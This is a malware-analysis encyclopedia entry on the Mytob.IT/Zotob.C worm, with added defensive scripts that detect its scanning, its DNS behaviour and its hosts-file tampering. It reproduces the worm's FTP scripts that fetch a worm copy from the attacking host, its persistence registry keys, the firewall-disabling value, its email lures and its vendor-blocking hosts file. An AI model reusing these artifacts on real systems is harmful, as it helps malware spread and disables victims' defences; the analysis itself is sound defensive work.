Threat Encyclopedia

Win32/Mytob.IT

Aliases: W32/Zotob.worm.c, W32/Zotob-C, W32.Zotob.C@mm, Zotob.C, WORM_ZOTOB.C
Type: Internet Worm
Affects: 32-bit Windows

Mytob.IT is a 31,744-byte worm, runtime-packed with UPack. Upon execution, the worm copies itself into the System32 folder as "per.exe".

The worm creates the mutex "B-O-T-Z-O-R" so that only one instance of the worm runs on a machine at a time.

The worm adds the following registry values so that it is started every time Windows starts:

HKLM\Software\Microsoft\Windows\CurrentVersion\Run
"WINDOWS SYSTEM" = "per.exe"

HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
"WINDOWS SYSTEM" = "per.exe"

Note: The worm continuously watches for these registry values and recreates them if they are removed.

Mytob.IT also modifies the following registry value:

HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess
"Start" = "4"

A Start value of 4 (SERVICE_DISABLED) prevents the SharedAccess service from being started. On Windows XP this service is the Windows Firewall/Internet Connection Sharing (ICS) service (Internet Connection Firewall/ICS before SP2), so the change turns off the host firewall and lowers the security of the compromised system.

Note: This disables Shared Access on Windows NT based systems.

The worm generates random IP addresses and attempts to connect to TCP port 445 on each one to exploit the Plug and Play buffer overflow vulnerability [see MS05-039 at http://www.microsoft.com/technet/security/Bulletin/MS05-039.mspx]. If the exploit succeeds, the shellcode executed on the target instructs it to connect back to the attacking system and retrieve a copy of the worm. The copy is transferred over a connection to the FTP server that the worm runs on the attacking machine, driven by the FTP command script 2pac.txt.

Note: The worm creates a task named "SCAN" for this purpose.

The 2pac.txt file contains the following ftp commands:

open %IP% %TCP port%
user hell rulez
binary
get haha.exe
quit

On the newly exploited system, FTP.EXE is executed with this script to retrieve a copy of the worm named "haha.exe" from the attacking system; the downloaded file is then started.

Note: The worm might also generate the file "ii" with the following FTP script commands:

open %IP% %TCP port%
user a a
binary
get lol.exe
bye

The worm's FTP server listens on TCP port 33333.
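
The spreading pattern described above leaves a recognisable trace in flow data: one host opening connections to TCP port 445 on many unrelated addresses, followed by those addresses connecting back to it on TCP port 33333 to fetch the worm. The following detector is an added example written for this write-up, not code from the worm or from the original analysis. The flow records are constructed, and their "<timestamp> <src> <dst> <dport> <proto>" layout is an assumption rather than the output of any particular tool.

```python
# Added example: flag hosts whose traffic matches the MS05-039 spreading pattern
# (many SYNs to TCP/445 at scattered addresses) and count how many victims pulled
# a copy from the host's FTP server on TCP/33333. Not code from the worm itself.
from collections import defaultdict

# Constructed sample flows; 10.0.0.7 scans random addresses, 10.0.0.9 is a
# normal SMB client talking to two local machines.
SAMPLE_FLOWS = """\
2005-08-16T09:59:58 10.0.0.7 198.51.100.14 445 tcp
2005-08-16T09:59:58 10.0.0.7 203.0.113.201 445 tcp
2005-08-16T09:59:58 10.0.0.7 192.0.2.77 445 tcp
2005-08-16T09:59:59 10.0.0.7 198.51.100.90 445 tcp
2005-08-16T09:59:59 10.0.0.7 203.0.113.5 445 tcp
2005-08-16T10:00:03 192.0.2.77 10.0.0.7 33333 tcp
2005-08-16T10:00:10 10.0.0.9 10.0.0.20 445 tcp
2005-08-16T10:00:11 10.0.0.9 10.0.0.21 445 tcp
2005-08-16T10:00:12 10.0.0.9 10.0.0.22 139 tcp
"""

PNP_PORT = 445          # MS05-039 is reached over SMB on TCP/445
WORM_FTP_PORT = 33333   # the worm's own FTP server, as stated in the write-up


def parse_flows(text):
    """Yield (src, dst, dport, proto) tuples; malformed lines are skipped."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue
        _ts, src, dst, dport, proto = parts
        if dport.isdigit():
            yield src, dst, int(dport), proto.lower()


def find_spreaders(text, min_targets=5):
    """Return {src: stats} for sources that hit at least min_targets distinct hosts on 445."""
    targets = defaultdict(set)   # src -> destinations contacted on 445
    pulls = defaultdict(set)     # infected host -> victims that fetched from its FTP port
    for src, dst, dport, proto in parse_flows(text):
        if proto != "tcp":
            continue
        if dport == PNP_PORT:
            targets[src].add(dst)
        elif dport == WORM_FTP_PORT:
            pulls[dst].add(src)  # dst is the host serving the worm copy
    report = {}
    for src, dsts in targets.items():
        if len(dsts) < min_targets:
            continue
        report[src] = {
            "scan_targets": len(dsts),
            # Random-IP scanning lands in unrelated /8 networks; a local SMB
            # client mostly stays inside its own network.
            "distinct_first_octets": len({d.split(".")[0] for d in dsts}),
            "ftp_pulls": len(pulls.get(src, ())),
        }
    return report


if __name__ == "__main__":
    for host, stats in find_spreaders(SAMPLE_FLOWS).items():
        print(host, stats)
```

The threshold of five distinct targets is deliberately low for the sample; on real flow data it should be tuned per segment, and the first-octet spread is the better discriminator between the worm's random scanning and a noisy but legitimate SMB client.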

The worm scans all fixed disks and collects e-mail addresses from files whose extensions match one of the following:

*.wab, *.adb, *.tbb, *.dbx, *.asp, *.php, *.sht, *.htm, *.pl, *.txt, *.xml, *.cgi, *.jsp

Because of a bug in how the worm builds the extension list (string concatenation) and compares it with the file names returned in WIN32_FIND_DATA, the files actually scanned are a superset of those with the listed extensions. The worm tests a found file's extension with a substring ("instring") search against the list rather than an exact comparison, so a file is opened and scanned for e-mail addresses whenever its extension occurs inside one of the listed extensions, that is, whenever its characters match the beginning of a listed extension in order.

For example, when looking for files with the extension .htm, the bug also causes the worm to open and search files with the extensions .h or .ht.
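
To make the effect of this bug concrete, the following is an added example written for this write-up, not code recovered from the worm: the substring check as described above next to the exact comparison that was presumably intended, plus a helper that enumerates every extension the buggy check lets through. The separator used when concatenating the list is an assumption; any separator that is not a dot or a letter behaves the same way.

```python
# Added example: the worm's substring-based extension check versus an exact
# match, so an analyst can see which additional files get opened and scanned.
EXT_LIST = [".wab", ".adb", ".tbb", ".dbx", ".asp", ".php", ".sht",
            ".htm", ".pl", ".txt", ".xml", ".cgi", ".jsp"]

# The worm keeps the list as one concatenated string and tests a found file's
# extension with a substring search on it. The space separator is an assumption.
EXT_BLOB = " ".join(EXT_LIST)


def extension_of(filename):
    """Extension including the leading dot, lower-cased; '' if there is none."""
    base = filename.replace("\\", "/").rsplit("/", 1)[-1]
    dot = base.rfind(".")
    return base[dot:].lower() if dot > 0 else ""


def worm_matches(filename):
    """The buggy check: true whenever the extension occurs anywhere in the blob."""
    ext = extension_of(filename)
    return ext != "" and ext in EXT_BLOB


def exact_matches(filename):
    """The intended check: exact comparison against the list."""
    return extension_of(filename) in EXT_LIST


def unintended_extensions():
    """Every extension the buggy check accepts that is not in the list.

    Because the searched string starts with '.', a hit can only be a prefix of
    a listed extension (e.g. '.h' and '.ht' from '.htm'); a name ending in a
    bare dot matches as well.
    """
    extra = set()
    for ext in EXT_LIST:
        for n in range(1, len(ext)):
            extra.add(ext[:n])
    return sorted(extra - set(EXT_LIST))


def files_opened_by_mistake(filenames):
    """Names the buggy check opens that the exact check would skip."""
    return sorted(f for f in filenames if worm_matches(f) and not exact_matches(f))


if __name__ == "__main__":
    print(unintended_extensions())
    print(files_opened_by_mistake(["index.htm", "foo.h", "main.c", "x.ph", "x.exe"]))
```

For forensic triage this matters: besides web and address-book files, the worm also reads C sources and headers (.c, .h), JavaScript (.js) and any file with a one- or two-letter extension that is a prefix of a listed one, so access-time evidence on such files does not by itself indicate a targeted interest in them.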

Mytob.IT also collects e-mail addresses from the Windows Address Book and from the following folders:

%Windir%\Temporary Internet Files
%Userprofile%\Local Settings\Temporary Internet Files
%System%

Mytob.IT performs DNS MX (mail exchange) queries to find a mail server for each domain it tries to send itself to. If the MX lookup fails, the worm guesses the mail server by prepending the following prefixes to the domain name:

gate.
mx.
mail.
smtp.
mx1.
mxs.
mail1.
relay.
ns.
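
This fallback is visible in DNS logs: a legitimate mail client resolves the MX record and then the exchanger it names, whereas an infected host, after a failed MX lookup, walks the fixed list of guessed names above. The detector below is an added example for this write-up, not part of the original analysis. The log lines are constructed, in an assumed "<timestamp> <client> <qtype> <qname> <rcode>" layout.

```python
# Added example: flag clients that, after a failed MX query for a domain,
# resolve several of the worm's guessed mail-server names for that domain.
WORM_PREFIXES = ["gate", "mx", "mail", "smtp", "mx1", "mxs", "mail1", "relay", "ns"]

# Constructed sample log: 10.0.0.7 behaves like the worm, 10.0.0.9 like an MTA.
SAMPLE_DNS_LOG = """\
2005-08-16T10:00:01 10.0.0.7 MX example.org NXDOMAIN
2005-08-16T10:00:01 10.0.0.7 A gate.example.org NXDOMAIN
2005-08-16T10:00:01 10.0.0.7 A mx.example.org NXDOMAIN
2005-08-16T10:00:02 10.0.0.7 A mail.example.org NOERROR
2005-08-16T10:00:05 10.0.0.9 MX corp.example NOERROR
2005-08-16T10:00:06 10.0.0.9 A mail.corp.example NOERROR
2005-08-16T10:00:07 10.0.0.7 MX other.test NXDOMAIN
2005-08-16T10:00:07 10.0.0.7 A gate.other.test NXDOMAIN
"""


def parse_dns_log(text):
    """Yield (client, qtype, qname, rcode); qnames lower-cased, trailing dot stripped."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue
        _ts, client, qtype, qname, rcode = parts
        yield client, qtype.upper(), qname.lower().rstrip("."), rcode.upper()


def guessed_prefix(qname, domain):
    """Return the worm prefix if qname is '<prefix>.<domain>', else None."""
    suffix = "." + domain
    if qname.endswith(suffix):
        label = qname[:-len(suffix)]
        if label in WORM_PREFIXES:
            return label
    return None


def find_mx_guessers(text, min_prefixes=3):
    """Return {(client, domain): [prefixes]} for clients that, after their MX
    query for domain failed, resolved at least min_prefixes guessed names."""
    failed_mx = set()   # (client, domain) whose MX query did not return NOERROR
    guesses = {}        # (client, domain) -> prefixes seen, in query order
    for client, qtype, qname, rcode in parse_dns_log(text):
        if qtype == "MX":
            if rcode != "NOERROR":
                failed_mx.add((client, qname))
            continue
        if qtype != "A":
            continue
        for c, domain in failed_mx:
            if c != client:
                continue
            prefix = guessed_prefix(qname, domain)
            if prefix is not None:
                guesses.setdefault((client, domain), []).append(prefix)
    return {k: v for k, v in guesses.items() if len(set(v)) >= min_prefixes}


if __name__ == "__main__":
    for (client, domain), prefixes in find_mx_guessers(SAMPLE_DNS_LOG).items():
        print(client, domain, prefixes)
```

A single guessed name is not conclusive (mail.example.org is a common hostname), which is why the detector requires several distinct prefixes for the same client and domain; the worm tries them in the order listed, so the sequence itself is a second signal.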

Mytob.IT randomly selects an e-mail subject out of the following list:

Warning!!
**Warning**
Hello
Confirmed...
Important!

The e-mail body contains one of the following message texts:

Looooool
We found a photo of you in ...
That's your photo!!?
hey!!
0K here is it!

The worm attaches a copy of itself under one of the following file names:

photo
your_photo
image
picture
sample
loool
webcam_photo

with one of the following file extensions:

bat
cmd
exe
scr
pif
zip

The worm may also attach itself as a ZIP file. The file inside the ZIP archive may have two extensions; the first is chosen from the following list:

bmp
jpg
jpeg

The second extension is chosen from the following list and is separated from the first by a long run of spaces, which pushes the real, executable extension out of view in most mail clients and file dialogs:

pif
scr
exe

The worm does not send to e-mail addresses containing any of the following strings:

abuse, security, admin, support, contact, webmaster, info, samples, postmaster, webmaster,
noone, nobody, nothing, anyone, someone, your, you, me, bugs, rating, site, contact, soft,
no, somebody, privacy, service, help, not, submit, feste, ca, gold-certs, the.bat, page

It also skips e-mail domains containing any of the following strings:

avp, syma, icrosof, msn., hotmail, panda, sopho, borlan, inpris, example, mydomai, nodomai, ruslis, .gov, gov., .mil, foo., unix, math, bsd, mit.e, gnu, fsf., ibm.com, google, kernel, linux, fido, usenet, iana, ietf, rfc-ed, sendmail, arin., ripe., isi.e, isc.o, secure, acketst, pgp, tanford.e, utgers.ed, mozilla, icrosoft, support, ntivi, unix, bsd, linux, listserv, certific,
google, account

Mytob.IT overwrites the hosts file with the following data. Mapping these names to 127.0.0.1 prevents the infected machine from reaching the listed security-vendor, update and e-commerce sites:

Botzor2 pnp+asn+mail spread. Greetz to good friend Coder. Based On HellBot3
{removed due to vulgar words}
127.0.0.1 www.symantec.com
127.0.0.1 securityresponse.symantec.com
127.0.0.1 symantec.com
127.0.0.1 www.sophos.com
127.0.0.1 sophos.com
127.0.0.1 www.mcafee.com
127.0.0.1 mcafee.com
127.0.0.1 liveupdate.symantecliveupdate.com
127.0.0.1 www.viruslist.com
127.0.0.1 viruslist.com
127.0.0.1 viruslist.com
127.0.0.1 f-secure.com
127.0.0.1 www.f-secure.com
127.0.0.1 kaspersky.com
127.0.0.1 kaspersky-labs.com
127.0.0.1 www.avp.com
127.0.0.1 www.kaspersky.com
127.0.0.1 avp.com
127.0.0.1 www.networkassociates.com
127.0.0.1 networkassociates.com
127.0.0.1 www.ca.com
127.0.0.1 ca.com
127.0.0.1 mast.mcafee.com
127.0.0.1 my-etrust.com
127.0.0.1 www.my-etrust.com
127.0.0.1 download.mcafee.com
127.0.0.1 dispatch.mcafee.com
127.0.0.1 secure.nai.com
127.0.0.1 nai.com
127.0.0.1 www.nai.com
127.0.0.1 update.symantec.com
127.0.0.1 updates.symantec.com
127.0.0.1 us.mcafee.com
127.0.0.1 liveupdate.symantec.com
127.0.0.1 customer.symantec.com
127.0.0.1 rads.mcafee.com
127.0.0.1 trendmicro.com
127.0.0.1 pandasoftware.com
127.0.0.1 www.pandasoftware.com
127.0.0.1 www.trendmicro.com
127.0.0.1 www.grisoft.com
127.0.0.1 www.microsoft.com
127.0.0.1 microsoft.com
127.0.0.1 www.virustotal.com
127.0.0.1 virustotal.com
127.0.0.1 www.amazon.com
127.0.0.1 www.amazon.co.uk
127.0.0.1 www.amazon.ca
127.0.0.1 www.amazon.fr
127.0.0.1 www.paypal.com
127.0.0.1 paypal.com
127.0.0.1 moneybookers.com
127.0.0.1 www.moneybookers.com
127.0.0.1 www.ebay.com
127.0.0.1 ebay.com
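
During clean-up the hosts file (%SystemRoot%\system32\drivers\etc\hosts) has to be inspected and repaired, and the same audit is useful as a generic check for other malware that blocks update sites the same way. The script below is an added example for this write-up, not code from the worm or the original analysis. It flags every name pinned to a loopback address and, going slightly beyond what this page describes, also names pinned to 0.0.0.0, which other families use for the same purpose. The sample content is constructed to resemble an infected file.

```python
# Added example: list and remove hosts-file entries that sinkhole names to the
# local machine, leaving every other line (comments, real mappings, junk) intact.
import ipaddress

# Constructed sample resembling the file after infection; the third line mimics
# the worm's greeting text, which is not a valid mapping.
SAMPLE_HOSTS = """\
# constructed sample hosts file
127.0.0.1       localhost
Botzor2 pnp+asn+mail spread. Greetz to good friend Coder. Based On HellBot3
127.0.0.1 www.symantec.com
127.0.0.1 liveupdate.symantecliveupdate.com
0.0.0.0 www.microsoft.com
10.1.2.3 intranet.corp.example
"""

LOOPBACK_NAMES = {"localhost", "localhost.localdomain"}   # legitimately loopback


def _pinned_names(line):
    """Names on one hosts line that are mapped to a loopback or unspecified address."""
    data = line.split("#", 1)[0].split()
    if len(data) < 2:
        return []
    try:
        ip = ipaddress.ip_address(data[0])
    except ValueError:
        return []   # not a mapping line (e.g. the worm's greeting text)
    if not (ip.is_loopback or ip.is_unspecified):
        return []
    return [h for h in data[1:] if h.lower() not in LOOPBACK_NAMES]


def sinkholed_names(text):
    """All host names the file blocks by pointing them at the local machine."""
    names = []
    for line in text.splitlines():
        names.extend(_pinned_names(line))
    return names


def remove_sinkholes(text):
    """Hosts text with the blocking lines removed; every other line is kept verbatim."""
    kept = [line for line in text.splitlines() if not _pinned_names(line)]
    return "\n".join(kept) + "\n"


if __name__ == "__main__":
    print(sinkholed_names(SAMPLE_HOSTS))
    print(remove_sinkholes(SAMPLE_HOSTS))
```

Restoring the file alone is not a cleanup: the worm re-creates its registry values and keeps its FTP server and IRC backdoor running, so the hosts file should be repaired only after the process is terminated and "per.exe" removed, otherwise the entries return.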

Other Details:

The worm also provides IRC backdoor functionality with the following capabilities:

Downloading files
Downloading new worm updates
Executing files
Providing uptime information to the remote controller
Providing information about the worm variant to the remote controller
Notifying IRC Channels/Operator via private message
Restarting the computer
Providing FTP Server Access on the compromised system
Removing components

It tries to connect to the IRC server diabl0.turkcoders.net.

References:

http://www.microsoft.com/technet/security/Bulletin/MS05-039.mspx

History: Analysis and Write-up by: Michael St. Neitzel